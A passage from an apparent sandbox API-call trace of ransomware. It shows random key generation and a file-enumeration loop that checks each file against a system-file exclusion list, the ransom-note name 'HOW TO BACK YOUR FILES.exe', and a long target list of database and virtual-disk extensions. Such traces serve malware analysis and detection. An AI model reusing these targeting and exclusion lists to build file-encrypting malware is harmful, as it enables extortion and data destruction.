dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x12c [0042.030] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x420000 [0042.031] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0042.032] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0042.032] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0042.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb478 [0042.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb478 | out: hHeap=0x2b0000) returned 1 [0042.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cba28 [0042.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0042.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0042.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0042.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cba28 [0042.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0042.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0042.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0042.033] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0042.033] CloseHandle (hObject=0x12c) returned 1 [0042.033] CloseHandle (hObject=0x160) returned 1 [0042.034] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0042.034] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0042.034] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0042.035] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49674100, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49674100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.035] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.035] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 1 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="aoldtz.exe") returned 1 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2=".") returned 1 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="..") returned 1 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="windows") returned -1 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="bootmgr") returned 1 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="temp") returned 1 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="pagefile.sys") returned 1 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="boot") returned 1 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="ids.txt") returned 1 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="ntuser.dat") returned 1 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="perflogs") returned 1 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="MSBuild") returned 1 [0042.035] lstrlenW (lpString="win7_scenic-demoshort_raw.wtv") returned 29 [0042.035] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 52 [0042.035] lstrcpyW (in: lpString1=0x2cce452, lpString2="win7_scenic-demoshort_raw.wtv" | out: lpString1="win7_scenic-demoshort_raw.wtv") returned="win7_scenic-demoshort_raw.wtv" [0042.035] lstrlenW (lpString="win7_scenic-demoshort_raw.wtv") returned 29 [0042.035] lstrlenW (lpString="Ares865") returned 7 [0042.035] lstrcmpiW (lpString1="raw.wtv", lpString2="Ares865") returned 1 [0042.035] lstrlenW (lpString=".dll") returned 4 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2=".dll") returned 1 [0042.035] lstrlenW (lpString=".lnk") returned 4 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2=".lnk") returned 1 [0042.035] lstrlenW (lpString=".ini") returned 4 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2=".ini") returned 1 [0042.035] lstrlenW (lpString=".sys") returned 4 [0042.035] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2=".sys") returned 1 [0042.036] lstrlenW (lpString="win7_scenic-demoshort_raw.wtv") returned 29 [0042.036] lstrlenW (lpString="bak") returned 3 [0042.036] lstrcmpiW (lpString1="wtv", lpString2="bak") returned 1 [0042.036] lstrlenW (lpString="ba_") returned 3 [0042.036] lstrcmpiW (lpString1="wtv", lpString2="ba_") returned 1 [0042.036] lstrlenW (lpString="dbb") returned 3 [0042.036] lstrcmpiW (lpString1="wtv", lpString2="dbb") returned 1 [0042.036] lstrlenW (lpString="vmdk") returned 4 [0042.036] lstrcmpiW (lpString1=".wtv", lpString2="vmdk") returned -1 [0042.036] lstrlenW (lpString="rar") returned 3 [0042.036] lstrcmpiW (lpString1="wtv", lpString2="rar") returned 1 [0042.036] lstrlenW (lpString="zip") returned 3 [0042.036] lstrcmpiW (lpString1="wtv", lpString2="zip") returned -1 [0042.036] lstrlenW (lpString="tgz") returned 3 [0042.036] lstrcmpiW (lpString1="wtv", lpString2="tgz") returned 1 [0042.036] lstrlenW (lpString="vbox") returned 4 [0042.036] lstrcmpiW (lpString1=".wtv", lpString2="vbox") returned -1 [0042.036] lstrlenW (lpString="vdi") returned 3 [0042.036] lstrcmpiW (lpString1="wtv", lpString2="vdi") returned 1 [0042.036] lstrlenW (lpString="vhd") returned 3 [0042.036] lstrcmpiW (lpString1="wtv", lpString2="vhd") returned 1 [0042.036] lstrlenW (lpString="vhdx") returned 4 [0042.036] lstrcmpiW (lpString1=".wtv", lpString2="vhdx") returned -1 [0042.036] lstrlenW (lpString="avhd") returned 4 [0042.036] lstrcmpiW (lpString1=".wtv", lpString2="avhd") returned -1 [0042.036] lstrlenW (lpString="db") returned 2 [0042.036] lstrcmpiW (lpString1="tv", lpString2="db") returned 1 [0042.036] lstrlenW (lpString="db2") returned 3 [0042.036] lstrcmpiW (lpString1="wtv", lpString2="db2") returned 1 [0042.036] lstrlenW (lpString="db3") returned 3 [0042.036] lstrcmpiW (lpString1="wtv", lpString2="db3") returned 1 [0042.036] lstrlenW (lpString="dbf") returned 3 [0042.036] lstrcmpiW (lpString1="wtv", lpString2="dbf") returned 1 [0042.036] lstrlenW (lpString="mdf") returned 3 [0042.036] lstrcmpiW (lpString1="wtv", lpString2="mdf") returned 1 [0042.037] lstrlenW (lpString="mdb") returned 3 [0042.037] lstrcmpiW (lpString1="wtv", lpString2="mdb") returned 1 [0042.037] lstrlenW (lpString="sql") returned 3 [0042.037] lstrcmpiW (lpString1="wtv", lpString2="sql") returned 1 [0042.037] lstrlenW (lpString="sqlite") returned 6 [0042.037] lstrcmpiW (lpString1="aw.wtv", lpString2="sqlite") returned -1 [0042.037] lstrlenW (lpString="sqlite3") returned 7 [0042.037] lstrcmpiW (lpString1="raw.wtv", lpString2="sqlite3") returned -1 [0042.037] lstrlenW (lpString="sqlitedb") returned 8 [0042.037] lstrcmpiW (lpString1="_raw.wtv", lpString2="sqlitedb") returned -1 [0042.037] lstrlenW (lpString="xml") returned 3 [0042.037] lstrcmpiW (lpString1="wtv", lpString2="xml") returned -1 [0042.037] lstrlenW (lpString="$er") returned 3 [0042.037] lstrcmpiW (lpString1="wtv", lpString2="$er") returned 1 [0042.037] lstrlenW (lpString="4dd") returned 3 [0042.037] lstrcmpiW (lpString1="wtv", lpString2="4dd") returned 1 [0042.037] lstrlenW (lpString="4dl") returned 3 [0042.037] lstrcmpiW (lpString1="wtv", lpString2="4dl") returned 1 [0042.037] lstrlenW (lpString="^^^") returned 3 [0042.037] lstrcmpiW (lpString1="wtv", lpString2="^^^") returned 1 [0042.037] lstrlenW (lpString="abs") returned 3 [0042.037] lstrcmpiW (lpString1="wtv", lpString2="abs") returned 1 [0042.037] lstrlenW (lpString="abx") returned 3 [0042.037] lstrcmpiW (lpString1="wtv", lpString2="abx") returned 1 [0042.037] lstrlenW (lpString="accdb") returned 5 [0042.037] lstrcmpiW (lpString1="w.wtv", lpString2="accdb") returned 1 [0042.037] lstrlenW (lpString="accdc") returned 5 [0042.037] lstrcmpiW (lpString1="w.wtv", lpString2="accdc") returned 1 [0042.037] lstrlenW (lpString="accde") returned 5 [0042.037] lstrcmpiW (lpString1="w.wtv", lpString2="accde") returned 1 [0042.037] lstrlenW (lpString="accdr") returned 5 [0042.037] lstrcmpiW (lpString1="w.wtv", lpString2="accdr") returned 1 [0042.037] lstrlenW (lpString="accdt") returned 5 [0042.037] lstrcmpiW (lpString1="w.wtv", lpString2="accdt") returned 1 [0042.037] lstrlenW (lpString="accdw") returned 5 [0042.038] lstrcmpiW (lpString1="w.wtv", lpString2="accdw") returned 1 [0042.038] lstrlenW (lpString="accft") returned 5 [0042.038] lstrcmpiW (lpString1="w.wtv", lpString2="accft") returned 1 [0042.038] lstrlenW (lpString="adb") returned 3 [0042.038] lstrcmpiW (lpString1="wtv", lpString2="adb") returned 1 [0042.038] lstrlenW (lpString="adb") returned 3 [0042.038] lstrcmpiW (lpString1="wtv", lpString2="adb") returned 1 [0042.038] lstrlenW (lpString="ade") returned 3 [0042.038] lstrcmpiW (lpString1="wtv", lpString2="ade") returned 1 [0042.038] lstrlenW (lpString="adf") returned 3 [0042.038] lstrcmpiW (lpString1="wtv", lpString2="adf") returned 1 [0042.038] lstrlenW (lpString="adn") returned 3 [0042.038] lstrcmpiW (lpString1="wtv", lpString2="adn") returned 1 [0042.038] lstrlenW (lpString="adp") returned 3 [0042.038] lstrcmpiW (lpString1="wtv", lpString2="adp") returned 1 [0042.038] lstrlenW (lpString="alf") returned 3 [0042.038] lstrcmpiW (lpString1="wtv", lpString2="alf") returned 1 [0042.038] lstrlenW (lpString="ask") returned 3 [0042.038] lstrcmpiW (lpString1="wtv", lpString2="ask") returned 1 [0042.038] lstrlenW (lpString="btr") returned 3 [0042.038] lstrcmpiW (lpString1="wtv", lpString2="btr") returned 1 [0042.038] lstrlenW (lpString="cat") returned 3 [0042.038] lstrcmpiW (lpString1="wtv", lpString2="cat") returned 1 [0042.038] lstrlenW (lpString="cdb") returned 3 [0042.038] lstrcmpiW (lpString1="wtv", lpString2="cdb") returned 1 [0042.038] lstrlenW (lpString="ckp") returned 3 [0042.038] lstrcmpiW (lpString1="wtv", lpString2="ckp") returned 1 [0042.038] lstrlenW (lpString="cma") returned 3 [0042.038] lstrcmpiW (lpString1="wtv", lpString2="cma") returned 1 [0042.038] lstrlenW (lpString="cpd") returned 3 [0042.038] lstrcmpiW (lpString1="wtv", lpString2="cpd") returned 1 [0042.038] lstrlenW (lpString="dacpac") returned 6 [0042.038] lstrcmpiW (lpString1="aw.wtv", lpString2="dacpac") returned -1 [0042.038] lstrlenW (lpString="dad") returned 3 [0042.039] lstrcmpiW (lpString1="wtv", lpString2="dad") returned 1 [0042.039] lstrlenW (lpString="dadiagrams") returned 10 [0042.039] lstrcmpiW (lpString1="rt_raw.wtv", lpString2="dadiagrams") returned 1 [0042.039] lstrlenW (lpString="daschema") returned 8 [0042.039] lstrcmpiW (lpString1="_raw.wtv", lpString2="daschema") returned -1 [0042.039] lstrlenW (lpString="db-journal") returned 10 [0042.039] lstrcmpiW (lpString1="rt_raw.wtv", lpString2="db-journal") returned 1 [0042.039] lstrlenW (lpString="db-shm") returned 6 [0042.039] lstrcmpiW (lpString1="aw.wtv", lpString2="db-shm") returned -1 [0042.039] lstrlenW (lpString="db-wal") returned 6 [0042.039] lstrcmpiW (lpString1="aw.wtv", lpString2="db-wal") returned -1 [0042.039] lstrlenW (lpString="dbc") returned 3 [0042.039] lstrcmpiW (lpString1="wtv", lpString2="dbc") returned 1 [0042.039] lstrlenW (lpString="dbs") returned 3 [0042.039] lstrcmpiW (lpString1="wtv", lpString2="dbs") returned 1 [0042.039] lstrlenW (lpString="dbt") returned 3 [0042.039] lstrcmpiW (lpString1="wtv", lpString2="dbt") returned 1 [0042.039] lstrlenW (lpString="dbv") returned 3 [0042.039] lstrcmpiW (lpString1="wtv", lpString2="dbv") returned 1 [0042.039] lstrlenW (lpString="dbx") returned 3 [0042.039] lstrcmpiW (lpString1="wtv", lpString2="dbx") returned 1 [0042.039] lstrlenW (lpString="dcb") returned 3 [0042.039] lstrcmpiW (lpString1="wtv", lpString2="dcb") returned 1 [0042.039] lstrlenW (lpString="dct") returned 3 [0042.039] lstrcmpiW (lpString1="wtv", lpString2="dct") returned 1 [0042.039] lstrlenW (lpString="dcx") returned 3 [0042.039] lstrcmpiW (lpString1="wtv", lpString2="dcx") returned 1 [0042.039] lstrlenW (lpString="ddl") returned 3 [0042.039] lstrcmpiW (lpString1="wtv", lpString2="ddl") returned 1 [0042.039] lstrlenW (lpString="dlis") returned 4 [0042.039] lstrcmpiW (lpString1=".wtv", lpString2="dlis") returned -1 [0042.039] lstrlenW (lpString="dp1") returned 3 [0042.039] lstrcmpiW (lpString1="wtv", lpString2="dp1") returned 1 [0042.039] lstrlenW (lpString="dqy") returned 3 [0042.040] lstrcmpiW (lpString1="wtv", lpString2="dqy") returned 1 [0042.040] lstrlenW (lpString="dsk") returned 3 [0042.040] lstrcmpiW (lpString1="wtv", lpString2="dsk") returned 1 [0042.040] lstrlenW (lpString="dsn") returned 3 [0042.040] lstrcmpiW (lpString1="wtv", lpString2="dsn") returned 1 [0042.040] lstrlenW (lpString="dtsx") returned 4 [0042.040] lstrcmpiW (lpString1=".wtv", lpString2="dtsx") returned -1 [0042.040] lstrlenW (lpString="dxl") returned 3 [0042.040] lstrcmpiW (lpString1="wtv", lpString2="dxl") returned 1 [0042.040] lstrlenW (lpString="eco") returned 3 [0042.040] lstrcmpiW (lpString1="wtv", lpString2="eco") returned 1 [0042.040] lstrlenW (lpString="ecx") returned 3 [0042.040] lstrcmpiW (lpString1="wtv", lpString2="ecx") returned 1 [0042.040] lstrlenW (lpString="edb") returned 3 [0042.040] lstrcmpiW (lpString1="wtv", lpString2="edb") returned 1 [0042.040] lstrlenW (lpString="epim") returned 4 [0042.040] lstrcmpiW (lpString1=".wtv", lpString2="epim") returned -1 [0042.040] lstrlenW (lpString="fcd") returned 3 [0042.040] lstrcmpiW (lpString1="wtv", lpString2="fcd") returned 1 [0042.040] lstrlenW (lpString="fdb") returned 3 [0042.040] lstrcmpiW (lpString1="wtv", lpString2="fdb") returned 1 [0042.040] lstrlenW (lpString="fic") returned 3 [0042.040] lstrcmpiW (lpString1="wtv", lpString2="fic") returned 1 [0042.040] lstrlenW (lpString="flexolibrary") returned 12 [0042.040] lstrcmpiW (lpString1="hort_raw.wtv", lpString2="flexolibrary") returned 1 [0042.040] lstrlenW (lpString="fm5") returned 3 [0042.040] lstrcmpiW (lpString1="wtv", lpString2="fm5") returned 1 [0042.040] lstrlenW (lpString="fmp") returned 3 [0042.040] lstrcmpiW (lpString1="wtv", lpString2="fmp") returned 1 [0042.040] lstrlenW (lpString="fmp12") returned 5 [0042.040] lstrcmpiW (lpString1="w.wtv", lpString2="fmp12") returned 1 [0042.040] lstrlenW (lpString="fmpsl") returned 5 [0042.040] lstrcmpiW (lpString1="w.wtv", lpString2="fmpsl") returned 1 [0042.040] lstrlenW (lpString="fol") returned 3 [0042.041] lstrcmpiW (lpString1="wtv", lpString2="fol") returned 1 [0042.041] lstrlenW (lpString="fp3") returned 3 [0042.041] lstrcmpiW (lpString1="wtv", lpString2="fp3") returned 1 [0042.041] lstrlenW (lpString="fp4") returned 3 [0042.041] lstrcmpiW (lpString1="wtv", lpString2="fp4") returned 1 [0042.041] lstrlenW (lpString="fp5") returned 3 [0042.041] lstrcmpiW (lpString1="wtv", lpString2="fp5") returned 1 [0042.041] lstrlenW (lpString="fp7") returned 3 [0042.041] lstrcmpiW (lpString1="wtv", lpString2="fp7") returned 1 [0042.041] lstrlenW (lpString="fpt") returned 3 [0042.041] lstrcmpiW (lpString1="wtv", lpString2="fpt") returned 1 [0042.041] lstrlenW (lpString="frm") returned 3 [0042.041] lstrcmpiW (lpString1="wtv", lpString2="frm") returned 1 [0042.041] lstrlenW (lpString="gdb") returned 3 [0042.041] lstrcmpiW (lpString1="wtv", lpString2="gdb") returned 1 [0042.041] lstrlenW (lpString="gdb") returned 3 [0042.041] lstrcmpiW (lpString1="wtv", lpString2="gdb") returned 1 [0042.041] lstrlenW (lpString="grdb") returned 4 [0042.041] lstrcmpiW (lpString1=".wtv", lpString2="grdb") returned -1 [0042.041] lstrlenW (lpString="gwi") returned 3 [0042.041] lstrcmpiW (lpString1="wtv", lpString2="gwi") returned 1 [0042.041] lstrlenW (lpString="hdb") returned 3 [0042.041] lstrcmpiW (lpString1="wtv", lpString2="hdb") returned 1 [0042.041] lstrlenW (lpString="his") returned 3 [0042.041] lstrcmpiW (lpString1="wtv", lpString2="his") returned 1 [0042.041] lstrlenW (lpString="ib") returned 2 [0042.041] lstrcmpiW (lpString1="tv", lpString2="ib") returned 1 [0042.041] lstrlenW (lpString="idb") returned 3 [0042.041] lstrcmpiW (lpString1="wtv", lpString2="idb") returned 1 [0042.041] lstrlenW (lpString="ihx") returned 3 [0042.041] lstrcmpiW (lpString1="wtv", lpString2="ihx") returned 1 [0042.041] lstrlenW (lpString="itdb") returned 4 [0042.041] lstrcmpiW (lpString1=".wtv", lpString2="itdb") returned -1 [0042.041] lstrlenW (lpString="itw") returned 3 [0042.041] lstrcmpiW (lpString1="wtv", lpString2="itw") returned 1 [0042.042] lstrlenW (lpString="jet") returned 3 [0042.042] lstrcmpiW (lpString1="wtv", lpString2="jet") returned 1 [0042.042] lstrlenW (lpString="jtx") returned 3 [0042.042] lstrcmpiW (lpString1="wtv", lpString2="jtx") returned 1 [0042.042] lstrlenW (lpString="kdb") returned 3 [0042.042] lstrcmpiW (lpString1="wtv", lpString2="kdb") returned 1 [0042.042] lstrlenW (lpString="kexi") returned 4 [0042.042] lstrcmpiW (lpString1=".wtv", lpString2="kexi") returned -1 [0042.042] lstrlenW (lpString="kexic") returned 5 [0042.042] lstrcmpiW (lpString1="w.wtv", lpString2="kexic") returned 1 [0042.042] lstrlenW (lpString="kexis") returned 5 [0042.042] lstrcmpiW (lpString1="w.wtv", lpString2="kexis") returned 1 [0042.042] lstrlenW (lpString="lgc") returned 3 [0042.042] lstrcmpiW (lpString1="wtv", lpString2="lgc") returned 1 [0042.042] lstrlenW (lpString="lwx") returned 3 [0042.042] lstrcmpiW (lpString1="wtv", lpString2="lwx") returned 1 [0042.042] lstrlenW (lpString="maf") returned 3 [0042.042] lstrcmpiW (lpString1="wtv", lpString2="maf") returned 1 [0042.042] lstrlenW (lpString="maq") returned 3 [0042.042] lstrcmpiW (lpString1="wtv", lpString2="maq") returned 1 [0042.042] lstrlenW (lpString="mar") returned 3 [0042.042] lstrcmpiW (lpString1="wtv", lpString2="mar") returned 1 [0042.042] lstrlenW (lpString="marshal") returned 7 [0042.042] lstrcmpiW (lpString1="raw.wtv", lpString2="marshal") returned 1 [0042.042] lstrlenW (lpString="mas") returned 3 [0042.042] lstrcmpiW (lpString1="wtv", lpString2="mas") returned 1 [0042.042] lstrlenW (lpString="mav") returned 3 [0042.042] lstrcmpiW (lpString1="wtv", lpString2="mav") returned 1 [0042.042] lstrlenW (lpString="maw") returned 3 [0042.042] lstrcmpiW (lpString1="wtv", lpString2="maw") returned 1 [0042.042] lstrlenW (lpString="mdbhtml") returned 7 [0042.042] lstrcmpiW (lpString1="raw.wtv", lpString2="mdbhtml") returned 1 [0042.042] lstrlenW (lpString="mdn") returned 3 [0042.042] lstrcmpiW (lpString1="wtv", lpString2="mdn") returned 1 [0042.043] lstrlenW (lpString="mdt") returned 3 [0042.043] lstrcmpiW (lpString1="wtv", lpString2="mdt") returned 1 [0042.043] lstrlenW (lpString="mfd") returned 3 [0042.043] lstrcmpiW (lpString1="wtv", lpString2="mfd") returned 1 [0042.043] lstrlenW (lpString="mpd") returned 3 [0042.043] lstrcmpiW (lpString1="wtv", lpString2="mpd") returned 1 [0042.043] lstrlenW (lpString="mrg") returned 3 [0042.043] lstrcmpiW (lpString1="wtv", lpString2="mrg") returned 1 [0042.043] lstrlenW (lpString="mud") returned 3 [0042.043] lstrcmpiW (lpString1="wtv", lpString2="mud") returned 1 [0042.043] lstrlenW (lpString="mwb") returned 3 [0042.043] lstrcmpiW (lpString1="wtv", lpString2="mwb") returned 1 [0042.043] lstrlenW (lpString="myd") returned 3 [0042.043] lstrcmpiW (lpString1="wtv", lpString2="myd") returned 1 [0042.043] lstrlenW (lpString="ndf") returned 3 [0042.043] lstrcmpiW (lpString1="wtv", lpString2="ndf") returned 1 [0042.043] lstrlenW (lpString="nnt") returned 3 [0042.043] lstrcmpiW (lpString1="wtv", lpString2="nnt") returned 1 [0042.043] lstrlenW (lpString="nrmlib") returned 6 [0042.043] lstrcmpiW (lpString1="aw.wtv", lpString2="nrmlib") returned -1 [0042.043] lstrlenW (lpString="ns2") returned 3 [0042.043] lstrcmpiW (lpString1="wtv", lpString2="ns2") returned 1 [0042.043] lstrlenW (lpString="ns3") returned 3 [0042.043] lstrcmpiW (lpString1="wtv", lpString2="ns3") returned 1 [0042.043] lstrlenW (lpString="ns4") returned 3 [0042.043] lstrcmpiW (lpString1="wtv", lpString2="ns4") returned 1 [0042.043] lstrlenW (lpString="nsf") returned 3 [0042.043] lstrcmpiW (lpString1="wtv", lpString2="nsf") returned 1 [0042.043] lstrlenW (lpString="nv") returned 2 [0042.043] lstrcmpiW (lpString1="tv", lpString2="nv") returned 1 [0042.043] lstrlenW (lpString="nv2") returned 3 [0042.043] lstrcmpiW (lpString1="wtv", lpString2="nv2") returned 1 [0042.043] lstrlenW (lpString="nwdb") returned 4 [0042.043] lstrcmpiW (lpString1=".wtv", lpString2="nwdb") returned -1 [0042.043] lstrlenW (lpString="nyf") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="nyf") returned 1 [0042.044] lstrlenW (lpString="odb") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="odb") returned 1 [0042.044] lstrlenW (lpString="odb") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="odb") returned 1 [0042.044] lstrlenW (lpString="oqy") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="oqy") returned 1 [0042.044] lstrlenW (lpString="ora") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="ora") returned 1 [0042.044] lstrlenW (lpString="orx") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="orx") returned 1 [0042.044] lstrlenW (lpString="owc") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="owc") returned 1 [0042.044] lstrlenW (lpString="p96") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="p96") returned 1 [0042.044] lstrlenW (lpString="p97") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="p97") returned 1 [0042.044] lstrlenW (lpString="pan") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="pan") returned 1 [0042.044] lstrlenW (lpString="pdb") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="pdb") returned 1 [0042.044] lstrlenW (lpString="pdm") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="pdm") returned 1 [0042.044] lstrlenW (lpString="pnz") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="pnz") returned 1 [0042.044] lstrlenW (lpString="qry") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="qry") returned 1 [0042.044] lstrlenW (lpString="qvd") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="qvd") returned 1 [0042.044] lstrlenW (lpString="rbf") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="rbf") returned 1 [0042.044] lstrlenW (lpString="rctd") returned 4 [0042.044] lstrcmpiW (lpString1=".wtv", lpString2="rctd") returned -1 [0042.044] lstrlenW (lpString="rod") returned 3 [0042.044] lstrcmpiW (lpString1="wtv", lpString2="rod") returned 1 [0042.045] lstrlenW (lpString="rodx") returned 4 [0042.045] lstrcmpiW (lpString1=".wtv", lpString2="rodx") returned -1 [0042.045] lstrlenW (lpString="rpd") returned 3 [0042.045] lstrcmpiW (lpString1="wtv", lpString2="rpd") returned 1 [0042.045] lstrlenW (lpString="rsd") returned 3 [0042.045] lstrcmpiW (lpString1="wtv", lpString2="rsd") returned 1 [0042.045] lstrlenW (lpString="sas7bdat") returned 8 [0042.045] lstrcmpiW (lpString1="_raw.wtv", lpString2="sas7bdat") returned -1 [0042.045] lstrlenW (lpString="sbf") returned 3 [0042.045] lstrcmpiW (lpString1="wtv", lpString2="sbf") returned 1 [0042.045] lstrlenW (lpString="scx") returned 3 [0042.045] lstrcmpiW (lpString1="wtv", lpString2="scx") returned 1 [0042.045] lstrlenW (lpString="sdb") returned 3 [0042.045] lstrcmpiW (lpString1="wtv", lpString2="sdb") returned 1 [0042.045] lstrlenW (lpString="sdc") returned 3 [0042.045] lstrcmpiW (lpString1="wtv", lpString2="sdc") returned 1 [0042.045] lstrlenW (lpString="sdf") returned 3 [0042.045] lstrcmpiW (lpString1="wtv", lpString2="sdf") returned 1 [0042.045] lstrlenW (lpString="sis") returned 3 [0042.045] lstrcmpiW (lpString1="wtv", lpString2="sis") returned 1 [0042.045] lstrlenW (lpString="spq") returned 3 [0042.045] lstrcmpiW (lpString1="wtv", lpString2="spq") returned 1 [0042.045] lstrlenW (lpString="te") returned 2 [0042.045] lstrcmpiW (lpString1="tv", lpString2="te") returned 1 [0042.045] lstrlenW (lpString="teacher") returned 7 [0042.045] lstrcmpiW (lpString1="raw.wtv", lpString2="teacher") returned -1 [0042.045] lstrlenW (lpString="tmd") returned 3 [0042.045] lstrcmpiW (lpString1="wtv", lpString2="tmd") returned 1 [0042.045] lstrlenW (lpString="tps") returned 3 [0042.045] lstrcmpiW (lpString1="wtv", lpString2="tps") returned 1 [0042.045] lstrlenW (lpString="trc") returned 3 [0042.045] lstrcmpiW (lpString1="wtv", lpString2="trc") returned 1 [0042.045] lstrlenW (lpString="trc") returned 3 [0042.045] lstrcmpiW (lpString1="wtv", lpString2="trc") returned 1 [0042.045] lstrlenW (lpString="trm") returned 3 [0042.046] lstrcmpiW (lpString1="wtv", lpString2="trm") returned 1 [0042.046] lstrlenW (lpString="udb") returned 3 [0042.046] lstrcmpiW (lpString1="wtv", lpString2="udb") returned 1 [0042.046] lstrlenW (lpString="udl") returned 3 [0042.046] lstrcmpiW (lpString1="wtv", lpString2="udl") returned 1 [0042.046] lstrlenW (lpString="usr") returned 3 [0042.046] lstrcmpiW (lpString1="wtv", lpString2="usr") returned 1 [0042.046] lstrlenW (lpString="v12") returned 3 [0042.046] lstrcmpiW (lpString1="wtv", lpString2="v12") returned 1 [0042.046] lstrlenW (lpString="vis") returned 3 [0042.046] lstrcmpiW (lpString1="wtv", lpString2="vis") returned 1 [0042.046] lstrlenW (lpString="vpd") returned 3 [0042.046] lstrcmpiW (lpString1="wtv", lpString2="vpd") returned 1 [0042.046] lstrlenW (lpString="vvv") returned 3 [0042.046] lstrcmpiW (lpString1="wtv", lpString2="vvv") returned 1 [0042.046] lstrlenW (lpString="wdb") returned 3 [0042.046] 